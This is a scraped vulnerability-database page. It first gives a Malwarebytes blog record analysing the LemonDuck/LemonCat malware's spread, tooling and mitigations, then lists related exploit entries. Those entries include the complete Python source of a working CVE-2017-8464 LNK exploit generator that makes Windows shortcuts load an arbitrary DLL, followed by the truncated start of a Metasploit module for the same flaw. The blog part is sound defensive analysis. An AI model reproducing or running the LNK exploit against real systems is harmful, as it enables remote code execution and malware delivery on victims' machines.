DATABASE RESOURCES PRICING ABOUT US

{"id": "MALWAREBYTES:3067D03AD5A4441FEBB702BADFD6C4A1", "type": "malwarebytes", "bulletinFamily": "blog", "title": "LemonDuck no longer settles for breadcrumbs", "description": "[LemonDuck](<https://blog.malwarebytes.com/detections/trojan-lemonduck/>) has evolved from a Monero cryptominer into LemonCat, a Trojan that specializes in backdoor installation, credential and data theft, and malware delivery, according to the Microsoft 365 Defender Threat Intelligence Team, which explained their findings in a two-part story [[1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>)][[2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>)] on the Microsoft Security blog. \n\n### LemonDuck\n\nTrojan.LemonDuck has always been an advanced cryptominer that is actively being updated with new exploits and obfuscation tricks. Among others, it aims to evade detection with its fileless miner. LemonDuck\u2019s threat to enterprises is also the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot families that targets Linux systems as well as Windows devices. Trojan.LemonDuck uses several methods for the initial infection and to propagate across networks:\n\n * Malspam: the email typically contains two files: a Word document exploiting [CVE-2017-8570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8570>) and a zip archive with a malicious JavaScript.\n * Server Message Block (SMB) vulnerabilities: Trojan.LemonDuck leverages [EternalBlue](<https://blog.malwarebytes.com/glossary/eternalblue/>) and the SMBGhost flaw to compromise a host as well as propagate to other machines within a network.\n * RDP brute-forcing: Trojan.LemonDuck\u2019s [RDP](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/brute-force-attacks-increasing/>) module scans for servers listening on port 3389 and tries to login as user \u2018administrator\u2019 from a list of passwords.\n * SSH brute-forcing: the Linux equivalent of RDP attacks. Trojan.LemonDuck scans for machines that are listening on port 22 and performs a brute-force attack using a list of passwords combined with the \u2018root\u2019 user name.\n * LNK vulnerability: leverages the vulnerability [CVE-2017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>) via USB removable drive that contain a malicious .LNK file.\n * [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>): an exploit for Exchange servers that allows an unauthenticated attacker to execute arbitrary commands onto vulnerable servers.\n\nLemonDuck does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\n### History\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. It was named after the variable \u201cLemon_Duck\u201d it utilized in one of the PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the [PCASTLE](<https://securityintelligence.com/news/fileless-attack-campaign-leverages-pcastle-to-distribute-xmrig-monero-mining-malware/>) tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\n### Evolution\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in manual post-breach involvement, which was adapted depending on the perceived value of compromised devices to the attackers. Which does not mean it stopped using the old infrastructure based on bulletproof hosting providers, which are unlikely to take any part of the LemonDuck infrastructure offline even when they are reported for malicious actions. This allows LemonDuck to persist and continue to be a threat.\n\n### LemonCat\n\nLemonCat was named as such after two domains with the word \u201ccat\u201d in them (sqlnetcat[.]com, netcatkit[.]com) that LemonDuck started using in January 2021. The infrastructure that includes those domains was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. These attacks typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware [Ramnit](<https://blog.malwarebytes.com/detections/worm-ramnit/>).\n\nOnce inside a system with an Outlook mailbox, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts. This bypasses many email security policies, for example those that forgo scanning internal mail or those that determine if an email is sent from a suspicious or unknown sender. After the emails are sent, the malware removes all traces of such activity, making it appear to the user as if nothing was sent. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\n### Human and automated infiltration\n\nAutomated infections, like the ones from malspam, launch a PowerShell script that pulls additional scripts from the [C&amp;C server](<https://blog.malwarebytes.com/glossary/cc/>). One of the first steps the infection tries once it has gained persistence is to disable or remove a series of security products like Microsoft Defender for Endpoint, Eset, Kaspersky, Avast, Norton Security, and Malwarebytes. They also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name.\n\nFrom here the methods vary based on how attractive the target is. LemonDuck leverages a wide range of free and open-source penetration testing tools. LemonDuck uses a script at installation and then repeatedly thereafter to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts. Another tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a mimi.dat file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. The most common name for the infection script is IF.Bin. In conjunction with credential theft, IF.Bin drops additional .BIN files to attempt common service exploits like [CVE-](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>)[2](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>)[017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>) to increase privilege.\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via a script called KR.Bin. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\n### Mitigation\n\nSome specific and more general mitigation techniques:\n\n * Disallow removable storage devices on sensitive endpoints or at least disable autorun.\n * Make sure your systems are fully patched and protected against brute-force attacks aimed at popular services like SMB, SSH, RDP, SQL, and others.\n * Turn on [tamper protection](<https://support.malwarebytes.com/hc/en-us/articles/360038990513-Configure-Tamper-Protection-options-in-Malwarebytes-Nebula>) so malware can\u2019t disable or uninstall your anti-malware.\n * Do not disable detection for potentially unwanted programs (PUPs) since some anti-malware classifies crypto-miners as potentially unwanted.\n * Block connections to known malicious domains and IP addresses.\n * Review your email scanning rules that are based on allowed sender addresses, since this malware can use trusted sender addresses.\n\nStay safe, everyone!\n\nThe post [LemonDuck no longer settles for breadcrumbs](<https://blog.malwarebytes.com/botnets/2021/07/lemonduck-no-longer-settles-for-breadcrumbs/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2021-07-30T17:19:31", "modified": "2021-07-30T17:19:31", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://blog.malwarebytes.com/botnets/2021/07/lemonduck-no-longer-settles-for-breadcrumbs/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2017-8464", "CVE-2017-8570"], "immutableFields": [], "lastseen": "2021-07-30T18:34:23", "viewCount": 358, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:01414FF4-26B2-4222-97E5-C5371A16E182", "AKB:CC1AB90B-52E1-444F-A6F4-1F3F95B15460"]}, {"type": "canvas", "idList": ["OFFICE_WSDL", "SPECIAL_LNK"]}, {"type": "cert", "idList": ["VU:824672"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0477", "CPAI-2017-0725"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:D70586B2C2D5D982D54DA686CCF0F4D1"]}, {"type": "cve", "idList": ["CVE-2017-0243", "CVE-2017-8464", "CVE-2017-8570"]}, {"type": "exploitdb", "idList": ["EDB-ID:42382", "EDB-ID:42429", "EDB-ID:44263"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:20DF492E20233C084EF3A6265A4CB16A", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:773C207F8B68CF5AB40483F3A9751D81"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170616-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11039", "KLA11046", "KLA11069", "KLA11842"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-CVE_2017_8464_LNK_RCE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2017_8464_LNK_LPE-"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2017-8464", "MS:CVE-2017-8570"]}, {"type": "mskb", "idList": ["KB3213545", "KB3213555", "KB3213624", "KB3213640", "KB4021903"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201787021", "MYHACK58:62201788412", "MYHACK58:62201788439", "MYHACK58:62201788476", "MYHACK58:62201788542", "MYHACK58:62201890088", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUL_OFFICE.NASL", "SMB_NT_MS17_JUN_4022714.NASL", "SMB_NT_MS17_JUN_4022715.NASL", "SMB_NT_MS17_JUN_4022719.NASL", "SMB_NT_MS17_JUN_4022724.NASL", "SMB_NT_MS17_JUN_4022725.NASL", "SMB_NT_MS17_JUN_4022726.NASL", "SMB_NT_MS17_JUN_4022727.NASL", "SMB_NT_MS17_JUN_4025685_VISTA.NASL", "SMB_NT_MS17_JUN_WIN2008.NASL", "SMB_NT_MS17_JUN_WINDOWS8.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108777", "OPENVAS:1361412562310810903", "OPENVAS:1361412562310811154", "OPENVAS:1361412562310811159", "OPENVAS:1361412562310811164", "OPENVAS:1361412562310811165", "OPENVAS:1361412562310811167", "OPENVAS:1361412562310811168", "OPENVAS:1361412562310811171", "OPENVAS:1361412562310811173", "OPENVAS:1361412562310811178", "OPENVAS:1361412562310811196", "OPENVAS:1361412562310811208", "OPENVAS:1361412562310811231", "OPENVAS:1361412562310811232", "OPENVAS:1361412562310811233", "OPENVAS:1361412562310811451"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143623", "PACKETSTORM:144927"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:E752DE2F12FECA2E217194D510424325"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4FC64923DC47E63250AA753E591FC7A7", "RAPID7COMMUNITY:5EEA40487C97CFD1AC5560D7EB4368F6"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:82490B192CB8F0CC0E1B0205E044FDB8", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-98818", "SMNTC-99445"]}, {"type": "talosblog", "idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336", "TALOSBLOG:7FDC117533451294884ABE03F31ED36B", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C"]}, {"type": "thn", "idList": ["THN:4220A2AF1052C7831C6C2F36BFA4CD47", "THN:6885760BEEB9A6CBDFB108443DDF540C"]}, {"type": "threatpost", "idList": ["THREATPOST:15B0A575618A05410227B72FFBBC216F", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:69233FAF477D3FFBB70EAF6FDC954DB3", "TRENDMICROBLOG:6AD718FC3C384CF6470A9D6815A565D3", "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "zdt", "idList": ["1337DAY-ID-28197", "1337DAY-ID-28245", "1337DAY-ID-28973", "1337DAY-ID-29976"]}]}, "score": {"value": 1.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:CC1AB90B-52E1-444F-A6F4-1F3F95B15460"]}, {"type": "canvas", "idList": ["SPECIAL_LNK"]}, {"type": "cert", "idList": ["VU:824672"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0477", "CPAI-2017-0725"]}, {"type": "cisa", "idList": ["CISA:D70586B2C2D5D982D54DA686CCF0F4D1"]}, {"type": "cve", "idList": ["CVE-2017-8464", "CVE-2017-8570"]}, {"type": "exploitdb", "idList": ["EDB-ID:44263"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170616-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11039", "KLA11046", "KLA11069"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2017-8464", "MS:CVE-2017-8570"]}, {"type": "mskb", "idList": ["KB3213624"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201787021"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUN_WINDOWS8.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810903", "OPENVAS:1361412562310811154", "OPENVAS:1361412562310811159", "OPENVAS:1361412562310811164", "OPENVAS:1361412562310811165", "OPENVAS:1361412562310811167", "OPENVAS:1361412562310811168", "OPENVAS:1361412562310811171", "OPENVAS:1361412562310811173", "OPENVAS:1361412562310811178", "OPENVAS:1361412562310811196", "OPENVAS:1361412562310811208"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143623"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E752DE2F12FECA2E217194D510424325"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:5EEA40487C97CFD1AC5560D7EB4368F6"]}, {"type": "securelist", "idList": ["SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:73735B62C781261398E44FFF82262BCD"]}, {"type": "symantec", "idList": ["SMNTC-99445"]}, {"type": "talosblog", "idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336", "TALOSBLOG:7FDC117533451294884ABE03F31ED36B"]}, {"type": "thn", "idList": ["THN:4220A2AF1052C7831C6C2F36BFA4CD47", "THN:6885760BEEB9A6CBDFB108443DDF540C"]}, {"type": "threatpost", "idList": ["THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6AD718FC3C384CF6470A9D6815A565D3", "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D"]}, {"type": "zdt", "idList": ["1337DAY-ID-29976"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-8464", "epss": "0.974840000", "percentile": "0.999390000", "modified": "2023-03-17"}, {"cve": "CVE-2017-8570", "epss": "0.974710000", "percentile": "0.999270000", "modified": "2023-03-17"}], "vulnersScore": 1.2}, "_state": {"dependencies": 1660004461, "score": 1659994274, "epss": 1679098904}, "_internal": {"score_hash": "554c0bb32945ea275f31e3bbde830c83"}}

{"zdt": [{"lastseen": "2018-02-06T01:16:08", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-08-06T00:00:00", "type": "zdt", "title": "Microsoft Windows - LNK Shortcut File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-08-06T00:00:00", "id": "1337DAY-ID-28245", "href": "https://0day.today/exploit/description/28245", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\r\n# CVE : 2017-8464\r\n# Authors : [ykoster, nixawk]\r\n# Notice : Only for educational purposes.\r\n# Support : python2\r\n \r\nimport struct\r\n \r\n \r\ndef generate_SHELL_LINK_HEADER():\r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | HeaderSize |\r\n # -----------------------------------------------------------------\r\n # | LinkCLSID (16 bytes) |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | LinkFlags |\r\n # -----------------------------------------------------------------\r\n # | FileAttributes |\r\n # -----------------------------------------------------------------\r\n # | CreationTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | AccessTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | WriteTime |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n # | FileSize |\r\n # -----------------------------------------------------------------\r\n # | IconIndex |\r\n # -----------------------------------------------------------------\r\n # | ShowCommand |\r\n # -----------------------------------------------------------------\r\n # | HotKey | Reserved1 |\r\n # -----------------------------------------------------------------\r\n # | Reserved2 |\r\n # -----------------------------------------------------------------\r\n # | Reserved3 |\r\n # -----------------------------------------------------------------\r\n \r\n shell_link_header = [\r\n b'\\x4c\\x00\\x00\\x00', # \"HeaderSize\" : (4 bytes)\r\n b'\\x01\\x14\\x02\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46', # \"LinkCLSID\" : (16 bytes) HKEY_CLASSES_ROOT\\CLSID\\{00021401-0000-0000-C000-000000000046}\r\n b'\\x81\\x00\\x00\\x00', # \"LinkFlags\" : (4 bytes) 0x81 = 0b10000001 = HasLinkTargetIDList + IsUnicode\r\n b'\\x00\\x00\\x00\\x00', # \"FileAttributes\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"CreationTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"AccessTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"WriteTime\" : (8 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"FileSize\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"IconIndex\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"ShowCommand\" : (4 bytes)\r\n b'\\x00\\x00', # \"HotKey\" : (2 bytes)\r\n b'\\x00\\x00', # \"Reserved1\" : (2 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"Reserved2\" : (4 bytes)\r\n b'\\x00\\x00\\x00\\x00', # \"Reserved3\" : (4 bytes)\r\n ]\r\n \r\n return b\"\".join(shell_link_header)\r\n \r\n \r\ndef generate_LINKTARGET_IDLIST(path, name):\r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | IDListSize | IDList(variable) |\r\n # -----------------------------------------------------------------\r\n # | ... |\r\n # -----------------------------------------------------------------\r\n \r\n # IDList = ItemID + ItemID + ... + TerminalID\r\n # ItemID = ItemIDSize + Data\r\n \r\n def generate_ItemID(Data):\r\n itemid = [\r\n struct.pack('H', len(Data) + 2), # ItemIDSize + len(Data)\r\n Data\r\n ]\r\n # ItemIDSize = struct.pack('H', len(Data) + 2) # ItemIDSize + len(Data)\r\n \r\n # return ItemIDSize + Data\r\n \r\n return b\"\".join(itemid)\r\n \r\n def generate_cpl_applet(path, name=name):\r\n name += b'\\x00'\r\n path += b'\\x00'\r\n \r\n bindata = [\r\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x6a\\x00\\x00\\x00\\x00\\x00\\x00',\r\n struct.pack('H', len(path)),\r\n struct.pack('H', len(name)),\r\n path.encode('utf-16')[2:],\r\n name.encode('utf-16')[2:],\r\n b\"\\x00\\x00\" # comment\r\n ]\r\n \r\n return b\"\".join(bindata)\r\n \r\n idlist = [\r\n # ItemIDList\r\n \r\n generate_ItemID(b'\\x1f\\x50\\xe0\\x4f\\xd0\\x20\\xea\\x3a\\x69\\x10\\xa2\\xd8\\x08\\x00\\x2b\\x30\\x30\\x9d'),\r\n generate_ItemID(b'\\x2e\\x80\\x20\\x20\\xec\\x21\\xea\\x3a\\x69\\x10\\xa2\\xdd\\x08\\x00\\x2b\\x30\\x30\\x9d'),\r\n generate_ItemID(generate_cpl_applet(path)),\r\n \r\n b'\\x00\\x00', # TerminalID\r\n ]\r\n \r\n idlist = b\"\".join(idlist)\r\n idlistsize = struct.pack('H', len(idlist))\r\n \r\n linktarget_idlist = [\r\n idlistsize,\r\n idlist,\r\n ]\r\n \r\n return b\"\".join(linktarget_idlist)\r\n \r\n \r\ndef generate_EXTRA_DATA():\r\n # ExtraData refers to a set of structures that convey additional information about a link target. These\r\n # optional structures can be present in an extra data section that is appended to the basic Shell Link\r\n # Binary File Format.\r\n \r\n # EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK\r\n \r\n # EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS /\r\n # ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS /\r\n # KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS /\r\n # SHIM_PROPS / SPECIAL_FOLDER_PROPS /\r\n # TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS\r\n \r\n # SpecialFolderDataBlock\r\n \r\n # _________________________________________________________________\r\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\r\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\r\n # -----------------------------------------------------------------\r\n # | BlockSize |\r\n # -----------------------------------------------------------------\r\n # | BlockSignatire |\r\n # -----------------------------------------------------------------\r\n # | SpecialFolderID |\r\n # -----------------------------------------------------------------\r\n # | Offset |\r\n # -----------------------------------------------------------------\r\n \r\n extra_data = [\r\n b'\\x10\\x00\\x00\\x00',\r\n b'\\x05\\x00\\x00\\xA0',\r\n b'\\x03\\x00\\x00\\x00',\r\n b'\\x28\\x00\\x00\\x00',\r\n b'\\x00\\x00\\x00\\x00' # TERMINAL_BLOCK\r\n ]\r\n \r\n return b\"\".join(extra_data)\r\n \r\n \r\ndef ms_shllink(path, name=b\"Microsoft\"):\r\n '''build Shell Link (.LNK) Binary File Format'''\r\n \r\n lnk_format = [\r\n \r\n # Structures\r\n \r\n # SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO]\r\n # [STRING_DATA] *EXTRA_DATA\r\n \r\n \r\n # SHELL_LINK_HEADER:\r\n # A ShelllinkHeader structure which contains identification information, timestamps, and\r\n # flags that specify the presence of optional structures.\r\n \r\n generate_SHELL_LINK_HEADER(),\r\n \r\n # LINKTARGET_IDLIST:\r\n # An optional LinkTargetIDList structure, which specifies the target of the link. The\r\n # presence of this structure is specified by the HasLinkTargetIDList bit in the ShellLinkHeader.\r\n #\r\n #\r\n \r\n generate_LINKTARGET_IDLIST(path, name),\r\n \r\n # LINKINFO:\r\n # An optional LinkInfo structure, which specifies information necessary to resolve the link target.\r\n # The presence of this structure is specified by the HasLinkInfo bit in the ShellLinkHeader.\r\n \r\n # STRING_DATA:\r\n # Zero or more optional StringData structures, which are used to convey user interface and path\r\n # identification information. The presence of these structures is specified by bits in the ShellLinkHeader.\r\n \r\n # STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR]\r\n # [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION]\r\n \r\n # EXTRA_DATA:\r\n # Zero or more ExtraData structures\r\n \r\n generate_EXTRA_DATA()\r\n ]\r\n \r\n return b\"\".join(lnk_format)\r\n \r\n \r\nif __name__ == '__main__':\r\n import sys\r\n \r\n if len(sys.argv) != 3:\r\n print(\"[*] Name : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\")\r\n print(\"[*] Usage: %s </path/to/test.lnk> </path/to/test.dll>\" % sys.argv[0])\r\n sys.exit(0)\r\n \r\n lnkpath = sys.argv[1]\r\n dllpath = sys.argv[2]\r\n \r\n bindata = ms_shllink(path=dllpath)\r\n \r\n with open(lnkpath, 'wb') as lnkf:\r\n lnkf.write(bindata)\r\n \r\n \r\n## References\r\n \r\n# 1. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464\r\n# 2. https://msdn.microsoft.com/en-us/library/dd871305.aspx\r\n# 3. https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]-160714.pdf\r\n# 4. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf\r\n# 5. https://support.microsoft.com/en-us/help/149648/description-of-control-panel--cpl-files\r\n# 6. https://twitter.com/mkolsek/status/877499744704237568\r\n# 7. https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WXi4uNPys6g\r\n# 8. https://github.com/rapid7/metasploit-framework/pull/8767\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/28245", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-19T02:08:31", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "zdt", "title": "Microsoft Windows - LNK Shortcut File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-07-26T00:00:00", "id": "1337DAY-ID-28197", "href": "https://0day.today/exploit/description/28197", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::EXE\r\n \r\n attr_accessor :exploit_dll_name\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'LNK Remote Code Execution Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\r\n that contain a dynamic icon, loaded from a malicious DLL.\r\n \r\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\r\n similar except in an additional SpecialFolderDataBlock is included. The folder ID set\r\n in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass\r\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\r\n DLL file.\r\n },\r\n 'Author' =>\r\n [\r\n 'Uncredited', # vulnerability 